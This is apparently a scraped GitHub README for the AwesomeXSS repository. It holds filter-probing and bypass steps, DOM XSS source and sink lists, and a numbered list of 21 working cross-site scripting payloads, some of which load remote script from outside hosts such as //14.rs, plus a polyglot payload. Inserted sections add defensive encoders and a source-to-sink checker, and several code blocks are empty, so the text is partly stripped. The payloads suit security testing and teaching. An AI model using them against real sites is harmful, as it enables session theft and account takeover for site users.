Project author: s0md3v

Project description:
Awesome XSS stuff
Primary language: JavaScript
Repository: git://github.com/s0md3v/AwesomeXSS.git
Created: 2018-03-11T14:35:30Z
Project page: https://github.com/s0md3v/AwesomeXSS

License: MIT License

Explanation of how it works, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/polyglot.png)

### Awesome Tags & Event Handlers

- [105 Event Handlers with description](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)
- [200 Event Handlers without description](http://pastebin.com/raw/WwcBmz5J)

Some less detected event handlers

```
ontoggle
onauxclick
ondblclick
oncontextmenu
onmouseleave
ontouchcancel
```

Some HTML tags that you will be using

```
img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video
```

### Awesome Context Breaking

#### HTML Context

Case: `You searched for $input. `

```
```

#### Attribute Context

Case: ``

```
">
">
```

### Awesome Probing

If nothing of this works, take a look at the **Awesome Bypassing** section.

First of all, enter a non-malicious string like **d3v** and look at the source code to get an idea about the number and contexts of reflections.

Now for attribute context, check if double quotes (") are being filtered by entering `x"d3v`. If it gets altered to `x&quot;d3v`, chances are that the output is getting properly escaped. If this happens, try doing the same for single quotes (') by entering `x'd3v`; if it gets altered to `x&#39;d3v`, you are doomed. The only thing you can try is encoding.

If the quotes are not being filtered, you can simply try payloads from the **Awesome Context Breaking** section.

For JavaScript context, check which quotes are being used, for example whether they are doing

```
variable = 'value'
or
variable = "value"
```

Now let's say single quotes (') are in use; in that case enter `x'd3v`. If it gets altered to `x\'d3v`, try escaping the backslash (\) by adding a backslash to your probe, i.e. `x\'d3v`. If it works, use the following payload:

```
\'-alert()//
```

But if it gets altered to `x\\\'d3v`, the only thing you can try is closing the script tag itself by using

```
```

For simple HTML context, the probe is `x`. If it gets stripped or altered in any way, it means the filter is looking for a pair of `<` and `>`. It can simply be bypassed using

```
```

### Awesome Bypassing

**Note:** None of these payloads use single (') or double quotes (").

- Without event handlers
  ```
  click here
  ```
- Without space
  ```
  ```
- Without equal sign (=)
  ```
  ```
- Without closing angular bracket (>)
  ```
  ```
- Without a valid HTML tag
  ```
  click here
  drag it
  ```
- Bypass tag blacklisting
  ```
  ```

### Awesome Encoding

|HTML|Char|Numeric|Description|Hex|CSS (ISO)|JS (Octal)|URL|
|----|----|-------|-----------|----|--------|----------|---|
|`&quot;`|"|`&#34;`|quotation mark|u+0022|\0022|\42|%22|
|`&num;`|#|`&#35;`|number sign|u+0023|\0023|\43|%23|
|`&dollar;`|$|`&#36;`|dollar sign|u+0024|\0024|\44|%24|
|`&percnt;`|%|`&#37;`|percent sign|u+0025|\0025|\45|%25|
|`&amp;`|&|`&#38;`|ampersand|u+0026|\0026|\46|%26|
|`&apos;`|'|`&#39;`|apostrophe|u+0027|\0027|\47|%27|
|`&lpar;`|(|`&#40;`|left parenthesis|u+0028|\0028|\50|%28|
|`&rpar;`|)|`&#41;`|right parenthesis|u+0029|\0029|\51|%29|
|`&ast;`|*|`&#42;`|asterisk|u+002A|\002a|\52|%2A|
|`&plus;`|+|`&#43;`|plus sign|u+002B|\002b|\53|%2B|
|`&comma;`|,|`&#44;`|comma|u+002C|\002c|\54|%2C|
|`&minus;`|-|`&#45;`|hyphen-minus|u+002D|\002d|\55|%2D|
|`&period;`|.|`&#46;`|full stop; period|u+002E|\002e|\56|%2E|
|`&sol;`|/|`&#47;`|solidus; slash|u+002F|\002f|\57|%2F|
|`&colon;`|:|`&#58;`|colon|u+003A|\003a|\72|%3A|
|`&semi;`|;|`&#59;`|semicolon|u+003B|\003b|\73|%3B|
|`&lt;`|<|`&#60;`|less-than|u+003C|\003c|\74|%3C|
|`&equals;`|=|`&#61;`|equals|u+003D|\003d|\75|%3D|
|`&gt;`|>|`&#62;`|greater-than sign|u+003E|\003e|\76|%3E|
|`&quest;`|?|`&#63;`|question mark|u+003F|\003f|\77|%3F|
|`&commat;`|@|`&#64;`|at sign; commercial at|u+0040|\0040|\100|%40|
|`&lsqb;`|\[|`&#91;`|left square bracket|u+005B|\005b|\133|%5B|
|`&bsol;`|\|`&#92;`|backslash|u+005C|\005c|\134|%5C|
|`&rsqb;`|]|`&#93;`|right square bracket|u+005D|\005d|\135|%5D|
|`&Hat;`|^|`&#94;`|circumflex accent|u+005E|\005e|\136|%5E|
|`&lowbar;`|_|`&#95;`|low line|u+005F|\005f|\137|%5F|
|`&grave;`|\`|`&#96;`|grave accent|u+0060|\0060|\u0060|%60|
|`&lcub;`|{|`&#123;`|left curly bracket|u+007b|\007b|\173|%7b|
|`&verbar;`|\||`&#124;`|vertical bar|u+007c|\007c|\174|%7c|
|`&rcub;`|}|`&#125;`|right curly bracket|u+007d|\007d|\175|%7d|

### Awesome Tips & Tricks

- `http(s)://` can be shortened to `//` or `/\\` or `\\`.
- `document.cookie` can be shortened to `cookie`. It applies to other DOM objects as well.
- alert and other pop-up functions don't need a value, so stop doing `alert('XSS')` and start doing `alert()`
- You can use `//` to close a tag instead of `>`.
- I have found that `confirm` is the least detected pop-up function, so stop using `alert`.
- Quotes around an attribute value aren't necessary as long as it doesn't contain spaces. You can use `
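The probing and encoding sections above show which characters must not survive in which reflection context. As an added example (not code from the AwesomeXSS repository), here is the defensive counterpart: one encoder per context, applied to the README's `You searched for $input` page. The function names are my own; the encoders use the `&#xHH;`, `\xHH` and `\uHHHH` forms from the encoding table above.

```javascript
// Added example (not the AwesomeXSS repository's code): context-aware output
// encoders for the three reflection points the README probes: HTML body,
// quoted attribute value and JavaScript string literal. Each one maps the
// characters from the "Awesome Encoding" table to a form that is inert in
// that context, so the probes (x"d3v, x'd3v, </script>) come back harmless.

// HTML body: "<" and ">" become entities, so a reflected tag is text, not markup.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Quoted attribute: every non-alphanumeric code point becomes &#xHH;, so a quote
// cannot close the attribute and the "=", space and backtick tricks find nothing.
function encodeHtmlAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, (c) =>
    '&#x' + c.codePointAt(0).toString(16).toUpperCase().padStart(2, '0') + ';');
}

// JavaScript string literal: \xHH / \uHHHH escapes, so neither a quote nor a
// literal </script> can leave the string (the HTML parser never sees a "<" here).
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, (c) => {
    const cp = c.codePointAt(0);
    if (cp < 0x100) return '\\x' + cp.toString(16).toUpperCase().padStart(2, '0');
    if (cp < 0x10000) return '\\u' + cp.toString(16).toUpperCase().padStart(4, '0');
    return '\\u{' + cp.toString(16).toUpperCase() + '}';
  });
}

// The README's reflection points, each rendered with the encoder for its context.
// One encoder applied to all three would leave at least one of them breakable.
function renderSearchPage(input) {
  return [
    `<p>You searched for ${encodeHtml(input)}.</p>`,
    `<input type="text" value="${encodeHtmlAttr(input)}">`,
    `<script>var query = '${encodeJsString(input)}';</script>`,
  ].join('\n');
}

console.log(renderSearchPage('</script><svg onload=confirm()>'));
```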

AwesomeXSS

This repository is a collection of Awesome XSS resources. Contributions are welcome and should be submitted via an issue.

Awesome contents

Awesome Challenges

Awesome Reads & Presentations

Awesome Tools

Awesome XSS Mind Maps

A beautiful XSS mind map by Jack Masa, here

Awesome DOM XSS

  • Does your input go into a sink? Vulnerable
  • It doesn’t? Not vulnerable

Source: An input that could be controlled by an external (untrusted) source.

  1. document.URL
  2. document.documentURI
  3. document.URLUnencoded (IE 5.5 or later Only)
  4. document.baseURI
  5. location
  6. location.href
  7. location.search
  8. location.hash
  9. location.pathname
  10. document.cookie
  11. document.referrer
  12. window.name
  13. history.pushState()
  14. history.replaceState()
  15. localStorage
  16. sessionStorage

Sink: A potentially dangerous method that could lead to a vulnerability, in this case DOM-based XSS.

  1. eval
  2. Function
  3. setTimeout
  4. setInterval
  5. setImmediate
  6. execScript
  7. crypto.generateCRMFRequest
  8. ScriptElement.src
  9. ScriptElement.text
  10. ScriptElement.textContent
  11. ScriptElement.innerText
  12. anyTag.onEventName
  13. document.write
  14. document.writeln
  15. anyElement.innerHTML
  16. Range.createContextualFragment
  17. window.location
  18. document.location

This comprehensive list of sinks and sources is taken from domxsswiki.
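The "does your input go into a sink?" rule above, turned into a small checker as an added example (not code from the AwesomeXSS repository or domxsswiki). It scans plain JavaScript text line by line for the listed sources reaching the listed sinks; the sample it scans is constructed here, and the function names are my own.

```javascript
// Added example (not the AwesomeXSS repository's code): a heuristic, line-level
// check for the rule "does your input go into a sink?". It remembers variables
// assigned from a listed source and reports each line where a source or a tainted
// variable reaches a listed sink. It is a triage aid, not a parser: calls, object
// properties and control flow are not followed, so silence means "not found".
// Sources from the list above that are readable as a property.
const SOURCE_RE = /\b(document\.(URL|documentURI|baseURI|cookie|referrer)|location(\.(href|search|hash|pathname))?|window\.name|localStorage|sessionStorage)\b/;
// Sinks, anchored where data is consumed: the "(" of a call or the "=" of an
// assignment. ScriptElement.src/.text and onEventName need element-type knowledge.
const SINK_RES = [
  /\b(eval|Function|setTimeout|setInterval|execScript)\s*\(/,
  /\bdocument\.write(ln)?\s*\(/,
  /\.innerHTML\s*=(?!=)/,
  /\bcreateContextualFragment\s*\(/,
  /\b(window|document)\.location(\.href)?\s*=(?!=)/,
];
// "var x = <expr>": group 1 is the variable, group 2 the assigned expression.
const ASSIGN_RE = /^\s*(?:var|let|const)?\s*([A-Za-z_]\w*)\s*=(?!=)(.*)$/;

// True if the text reads a source or mentions an already tainted variable.
function isTainted(text, tainted) {
  if (SOURCE_RE.test(text)) return true;
  return [...tainted].some((v) => new RegExp('\\b' + v + '\\b').test(text));
}

function findSourceToSink(js) {
  const tainted = new Set(), findings = [];
  js.split('\n').forEach((stmt, i) => {
    const assign = stmt.match(ASSIGN_RE);
    if (assign && isTainted(assign[2], tainted)) tainted.add(assign[1]);
    for (const re of SINK_RES) {
      const m = re.exec(stmt);
      // Only data to the right of the sink counts as flowing into it.
      if (m && isTainted(stmt.slice(m.index + m[0].length), tainted)) {
        findings.push({ line: i + 1, sink: m[0].trim(), code: stmt.trim() });
        break;
      }
    }
  });
  return findings;
}

// Constructed sample (not from a real site): lines 3 and 5 reach a sink, the rest do not.
const SAMPLE = `var q = decodeURIComponent(location.hash.slice(1));
var greeting = 'Hello ' + q;
document.getElementById('out').innerHTML = greeting;
document.getElementById('out').textContent = greeting;
eval(document.cookie.split('=')[1]);
window.location = '/home';`;
console.log(findSourceToSink(SAMPLE)); // line 3 '.innerHTML =' and line 5 'eval('
```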

Awesome Payloads

  1. <A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
  2. <d3"<"/onclick="1>[confirm``]"<">z
  3. <d3/onmouseenter=[2].find(confirm)>z
  4. <details open ontoggle=confirm()>
  5. <script y="><">/*<script* */prompt()</script
  6. <w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
  7. <a href="javascript%26colon;alert(1)">click
  8. <a href=javascript:alert(1)>click
  9. <script/"<a"/src=data:=".<a,[8].some(confirm)>
  10. <svg/x=">"/onload=confirm()//
  11. <--`<img/src=` onerror=confirm``> --!>
  12. <svg%0Aonload=%09((pro\u006dpt))()//
  13. <sCript x>(((confirm)))``</scRipt x>
  14. <svg </onload ="1> (_=prompt,_(1)) "">
  15. <!--><script src=//14.rs>
  16. <embed src=//14.rs>
  17. <script x=">" src=//15.rs></script>
  18. <!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` /></Image>
  19. <iframe/src \/\/onload = prompt(1)
  20. <x oncut=alert()>x
  21. <svg onload=write()>

Awesome Polyglots

Here's an XSS polyglot that I made which can break out of 20+ contexts:

```
%0ajavascript:/\"/--><svg onload='/*
```